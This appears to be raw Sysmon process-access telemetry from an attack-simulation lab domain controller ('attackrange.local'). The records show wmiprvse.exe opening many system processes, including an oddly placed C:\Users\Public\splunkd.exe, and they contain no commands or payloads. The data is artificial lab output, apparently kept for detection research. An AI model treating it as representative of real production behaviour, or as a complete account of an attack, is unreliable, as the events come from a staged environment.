15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 